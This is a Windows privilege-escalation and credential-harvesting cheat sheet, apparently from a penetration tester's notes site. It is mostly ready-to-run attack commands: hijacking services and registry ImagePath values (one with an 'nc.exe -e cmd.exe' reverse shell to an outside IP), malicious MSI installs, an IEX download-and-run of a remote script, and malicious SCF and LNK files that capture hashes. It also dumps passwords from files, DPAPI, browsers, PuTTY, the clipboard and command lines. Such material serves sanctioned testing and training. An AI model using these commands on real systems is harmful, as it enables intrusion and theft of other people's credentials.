TerminalCode

Windows

Enumeration

Tool
Details

WinPEAS

DOWNLOAD. In Metasploit.

PrivescCheck

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" Get-Content .\PrivescCheck.ps1 | Out-String | IEX

Functionality

LOLBAS shows how to exploit vulnerabilities on known programs to perform privileged actions.

LogoLOLBAS

Groups and Privileges

Privileges should be displayed possibly with privileged shell.

whoami /priv

They should be activated with EnableAllTokenPrivs.ps1.

.\EnableAllTokenPrivs.ps1

See HERE for full list.

User Account Control (UAC)

Feature that enables a consent prompt for elevated activities. When UAC is enabled, applications and tasks always run under the security context of a non-administrator account unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run. UAC has various integrity levels ranging from low to high.

Check if UAC is enabled.

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

UACMe

Compile UACMe with Visual Studio to get akagi.exe.

Check version and obtain Build

[environment]::OSVersion.Version

Search for the Key based on the Build number in the github

akagi.exe [Key] [Param]

Misconfigurations & Weak Permissions

Tool
Details

SharpUp

.\SharpUp.exe audit

PowerUP (PowerSploit or Empire)

powershell -ep bypass . .\PowerUp.ps1 See HERE.

Modifiable Service Binaries (weak ACLs)

.\SharpUp.exe audit
# === Modifiable Service Binaries ===

Using icacls we can verify the vulnerability and see if we have full permissions to the directory.

icacls "<PathName>"

At this point we can replace service binary with malicious binary generated with msfvenom.

cmd /c copy /Y "<MaliciousExe>" "<PathName>"

Start Service.

sc.exe stop <NameService>
sc.exe start <NameService>
sc.exe query <NameService> # for checking after recovery
# or
net stop <NameService>
net start <NameService>
Restart-Service <NameService>

Modifiable Services

.\SharpUp.exe audit
# === Modifiable Service ===

Next, we'll use AccessChk from the Sysinternals suite to enumerate permissions on the service.

accesschk.exe /accepteula -quvcw <NameService>

We can use our permissions to change the binary path maliciously.

sc.exe config <NameService> binPath= "cmd /c <COMMAND>"

Start service.

sc.exe stop <NameService>
sc.exe start <NameService>
sc.exe query <NameService> # for checking after recovery
# or
net stop <NameService>
net start <NameService>
Restart-Service <NameService>

Unquoted Service Paths

If the path of a binary file of a service contains one or more spaces and is not enclosed in quotes, it can be interpreted in various ways by Windows. It starts from left to right and stops at each space, adding .exe. So if we can put a binary file in one of these subdirectories and restart the service, then our binary will be executed. Although it's not uncommon to find applications with unquoted service paths, it isn't often exploitable.

We can identify unquoted service binary paths using

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

Or with PowerUP (PowerSploit or Empire)

. .\PowerUp.ps1
Get-UnquotedService

Permissive Registry ACLs

It is also worth searching for weak service ACLs in the Windows Registry, with AccessChk from the Sysinternals suite

accesschk.exe /accepteula "<USER>" -kvuqsw hklm\System\CurrentControlSet\services

# RW HKLM\System\CurrentControlSet\services\ModelManagerService
#        KEY_ALL_ACCESS

We can abuse this using

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
# start service

Modifiable Registry Autorun Binary

We can use WMIC to see what programs run at system startup. Suppose we have write permissions to the registry for a given binary or can overwrite a binary listed. In that case, we may be able to escalate privileges to another user the next time that the user logs in.

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

File

Search for sensitive information in different files

dir /s *<STRING>*

unattend.xml

dir /s *unattend.xml*
dir /s *autounattend.xml*

Application Configuration Files

Look for readable configuration files in which passwords can be saved.

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
cd c:\Users\<USER>\Documents & findstr /SI /M "password" *.xml *.ini *.txt
select-string -Path C:\Users\<USER>\Documents\*.txt -Pattern password
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ *.config
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Dictionary Files

The user can add words to their dictionary to avoid the distracting red underline, including passwords.

gc 'C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String <STRING>

PowerShell Credentials

Administrators often need to create automated scripts for users that also contain credentials. The credentials are encrypted and protected via DPAPI, which typically means they can only be decrypted by the same user on the same computer they were created on.

Example script

# Connect-VC.ps1
# Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml'
$encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
$decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword

If we have gained command execution in the context of this user we can recover the cleartext credentials

$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
$credential.GetNetworkCredential().username
$credential.GetNetworkCredential().password

StickyNotes

C:\Users\<USER>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

Copy them to your system and open them with DB Browser for SQLite, or with PSSQLite on the target

Import-Module .\PSSQLite.psd1
$db = 'C:\Users\<USER>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap

Password Managers

KeePass, 1Password, Thycotic, CyberArk, etc.

dir /s *.kdbx*
keepass2john <FILE.kdbx>

Crack with hashcat 13400.

VHDX & VMDK

dir /S /B *.vhd == *.vhdx == *.vmdk
Get-ChildItem -Path C:\ -Recurse -Include *.vhd, *.vhdx, *.vmdk -ErrorAction SilentlyContinue

We can get SYSTEM, SAM and SECURITY files.

guestmount --add <FILE>.vhdx  --ro /mnt/vhdx/ [-m /dev/sda1]

Shares SMB

With netexec search for interesting files among the shares.

nxc smb <IP> -u <USER> -p <PASS> --spider '<SHARE>' --regex '<REGEX>'
nxc smb <IP> -u <USER> -p <PASS> -M spider_plus

(try again if there are errors)

Password

Search for passwords saved in the system.

Tool
Details

LaZagne

It searches for passwords. laZagne.exe all

SessionGopher

Extract saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials. Import-Module .\SessionGopher.ps1 Invoke-SessionGopher -Target <MACHINE, es.WINLPE-SRV01>

Snaffler

It searches for passwords and interesting file. .\snaffler.exe -s -o snaffler.log [-i] .\snaffler.exe -s -d <domain> -o snaffler.log [-i]

Browser

Tool
Details

SharpChrome

Retrieve cookies and saved logins from Google Chrome. .\SharpChrome.exe logins /unprotect

SharpChromium

Retrieve Chromium data, such as cookies, history and saved logins.

Invoke-SharpChromium

PowerShell script which uses reflection to load SharpChromium. Import-Module .\Invoke-SharpChromium.ps1 Invoke-SharpChromium -Command "cookies <SITE>" If we have a path error, copy the cookie file path that contains the database to the location SharpChromium is expecting.

cookieextractor

Extract cookies from the Firefox cookies.SQLite database. Copy and transfer the DB with cookies to the attacking machine. copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .

Archived Passwords

cmdkey /list
# take note of user

Connect with RDP GUI or with runas

runas /savecred /user:<DOMAIN>\<USER> "<COMMAND>"

Autorun

Windows Autologon allows a system to automatically log on to a specific user account, without requiring manual input of the username and password at each startup. The username and password are stored in the registry, in clear-text. Autologon.exe from the Sysinternals suite encrypt the password as an LSA secret.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Putty

For Putty sessions utilizing a proxy connection, when the session is saved, the credentials are stored in the registry in clear text.

reg query "HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions"
# take note of sessions
reg query "HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<NAME_SESSION>"

if we had admin privileges, we would be able to find it under the corresponding user's hive in HKEY_USERS.

DPAPI

The DPAPI (Data Protection API) is an internal component in the Windows system. It allows various applications to store sensitive data (e.g. passwords). The data are stored in the users directory and are secured by user-specific master keys derived from the users password.

# MASTER KEY ENCRYPTED
ls -Hidden C:\<Users>\USER\AppData\Roaming\Microsoft\Protect\
ls -Hidden C:\<Users>\USER\AppData\Local\Microsoft\Protect\
# PROTECTED FILE
ls -Hidden C:\<Users>\USER\AppData\Roaming\Microsoft\Credentials\
ls -Hidden C:\<Users>\USER\AppData\Local\Microsoft\Credentials\

Get-Content <FILE>

IMPORTANT: Copy files well from windows (ex. use base64)

impacket-dpapi

Extract Master Key dpapi masterkey -file <MASTERKEY> -sid "<SUID>" -password '<USER_PASS>' Extract Protected Data wit Master Key dpapi credential -f <PROTECTED_FILE> -key <MASTERKEY>

Other tools like DonPAPI, dpapick, dpapilab and secretsdump.py.

Various

Variables

Check environment variables for sensitive information such as passwords or misconfiguration.

set 
Get-ChildItem Env: | ft key,value

History

Often administrators clean the history only with Clear-History, but this is not enough as it only cleans the Get-History, but the history can be found with PSReadline.

Get-History 
(Get-PSReadLineOption).HistorySavePath
gc (Get-PSReadLineOption).HistorySavePath
C:\Users\USER\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt.
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Scheduled Tasks

Get-ScheduledTask
schtasks /query /fo LIST /v
# Task To Run

Unfortunately, we cannot list out scheduled tasks created by other users (such as admins) because they are stored in C:\Windows\System32\Tasks. Perform an analysis if there are files that can be the target of Scheduled Tasks by Administrator.

DLL Injection

Vulnerable Service & Applications

Some services/applications may allow us to escalate to SYSTEM. Enumerate the installed applications carefully and check if they contain vulnerabilities.

Druva inSync 6.6.3

CVE-2020-5752 with Invoke-PowerShellTcp.ps1 (see Reverse Shell)

mRemoteNG

Used to manage and connect to remote systems using VNC, RDP, SSH, and similar protocols. %USERPROFILE%\APPDATA\Roaming\mRemoteNG\confCons.xml (take password in <NODE>) Use mRemoteNG-Decrypt mremoteng_decrypt.py -s "<PASSWORD>" mremoteng_decrypt.py -s "<PASSWORD>" -p <MasterPass> (try brute force MasterPass with wordlists and foreach)

Always Install Elevated

You can add /v AlwaysInstallElevated

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

Create msi payload with msfvenom and run it on target.

msiexec /i myExploit.msi /quiet /qn /norestart

Or use Write-UserAddMSI in PowerUP (PowerSploit or Empire)

Import-Module .\PowerUp.ps1
Write-UserAddMSI
.\UserAdd.msi

Citrix Breakout

It is possible to utilize windows dialog boxes (with features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, Print, etc.) as a means to bypass the restrictions imposed on users when browsing directories.

In File Name with All Files in File-Type.

\\127.0.0.1\c$\<PATH>

With smbserver on the attacker

\\<MY_IP>\share

Due to the presence of restrictions within the File Explorer, direct file copying is not viable. An alternative approach involves: right-clicking > run Where the executable will open a terminal, as it is the following:

#include <stdlib.h>
int main() {
  system("C:\\Windows\\System32\\cmd.exe");
}

See resources1, resources2

Email

MailSniper

Searching through email in a Microsoft Exchange environment for specific terms.

Clipboard

Invoke-Clipboard

Stealing the clipboard Import-Module .\Invoke-Clipboard.ps1 Invoke-ClipboardLogger

Backup Program

restic

In $env:RESTIC_PASSWORD is saved the password that is used for backup, if it is not present it will be requested each time.

restic.exe -r E:\restic init (init backup directory) restic.exe -r E:\restic\ backup C:\FolderToBackup --use-fs-snapshot to create a Volume Shadow Copy for files actively used

restic.exe -r E:\restic\ snapshots restic.exe -r E:\restic\ restore <ID> --target C:\RestoreHere

Interacting with Users

Passive Traffic

Tool
Details

PCredz

Capture sensitive information from live network traffic, with tcpdump

net-creds

Sniffs sensitive data from interface or pcap

Monitoring for Process Command Lines

When getting a shell as a user, there may be scheduled tasks or other processes being executed which pass credentials on the command line. This script captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.

procmon.ps1
while($true)
{

  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2

}

IEX (iwr 'http://<MY_IP>:<MY_PORT>/procmon.ps1')

SCF

If there are public folders that are also accessed by other users and that we have write permissions to, we can insert an .scf file that is executed every time the folder containing it is opened. Using SCFs no longer works on Server 2019 hosts.

<NAME>.scf
[Shell]
Command=2
IconFile=\\<MY_IP>\share\legit.ico
[Taskbar]
Command=ToggleDesktop
sudo responder -I <INTERFACE>

LNK

We can get the same effect as SCF using a malicious .lnk file. We can use various tools to generate a malicious .lnk file, such as Lnkbomb, or we can run this code. 

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\<PATH>\<NAME>.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Kernel

Exploit Kernel Level. Depends on Kernel Version and Operating System. May cause crashes!

Examine the installed update and search KB (Microsoft Knowledge Base ID number) in Update Catalog

systeminfo
wmic qfe list brief
Get-Hotfix
Tool
Details

Sherlock

PowerShell script to quickly find missing software patches. Import-Module .\Sherlock.ps1 Find-AllVulns

Watson

Enumerate missing KBs and suggest exploits.

wesng

Windows Exploit Suggester.

Windows-Exploit-Suggester

Python script for detect potential missing patches. python2.7 windows-exploit-suggester.py --update Save systeminfo output from target windows system. python2.7 windows-exploit-suggester.py --database <DB.xlsx> --systeminfo <SYSTEMINFO.txt>

See Windows-CVE section.

Last updated

Was this helpful?